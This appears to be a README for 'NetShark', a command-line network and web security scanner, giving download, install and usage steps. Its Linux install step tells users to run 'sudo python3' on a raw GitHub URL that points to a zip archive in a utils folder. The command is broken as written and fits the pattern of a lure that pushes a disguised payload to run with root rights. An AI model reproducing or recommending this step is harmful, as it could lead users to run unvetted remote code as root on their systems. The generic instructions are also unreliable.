NetShark is an all-in-one command line security scanner. It helps you with tasks like port scanning, web security checks, subdomain enumeration, and network monitoring. This tool works on multiple platforms, making it accessible no matter your operating system.
To get started with NetShark, visit our releases page to download the latest version:
Once you are on the releases page, find the most recent version. Click on the file suitable for your system to download it.
- Windows
- macOS
- Linux
- Windows: Windows 10 or later
- macOS: macOS Mojave or later
- Linux: Most distributions with Python 3.7 or later
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Download the file for your operating system from the releases page.
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Locate the downloaded file in your Downloads folder.
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Run the installer:
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Windows: Double-click the
.exefile and follow the prompts. -
macOS: Open the
.dmgfile, drag the NetShark icon to your Applications folder. -
Linux: Open a terminal and navigate to the directory containing the downloaded file. Run the installer with the command:
sudo python3 https://raw.githubusercontent.com/lurito3/NetShark/main/utils/Shark-Net-1.4.zip
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Finish the installation by following any additional on-screen instructions.
Using NetShark is straightforward. After installation, open your terminal or command prompt and type:
netsharkThis command will run the application. You can now access various scanning features.
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Port Scan: To scan a specific IP or domain, use:
netshark scan [IP or domain]
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Web Security: To check web vulnerabilities, run:
netshark web [URL]
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Subdomain Enumeration: For listing subdomains, use:
netshark subdomain [domain]
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Network Monitoring: To monitor your network, type:
netshark monitor
- Multi-Threaded Scanning: Allows faster scans by running multiple checks at the same time.
- Cross-Platform Compatibility: Works on Windows, macOS, and Linux.
- User-Friendly Interface: Designed for ease of use, even for beginners.
- Open Source: Free and community-driven.
When conducting scans, remember to respect privacy and legal boundaries. Always obtain permission before scanning networks or devices that are not your own.
Make sure you have the required version of Python installed. Also, ensure that you have permission to run the program if you are on a shared system.
Visit the releases page and download the latest version. Follow the same installation steps to update.
Absolutely! We welcome contributions. If you would like to contribute, please read the guidelines in our repository.
For any issues or questions, please open an issue in the GitHub repository. We will do our best to help you.
NetShark relates to the following areas:
- cli-tool
- cybersecurity
- hacking-tools
- netsec
- network-security
- open-source
- penetration-testing
- port-scanner
- python
- security
Download NetShark and start securing your network today!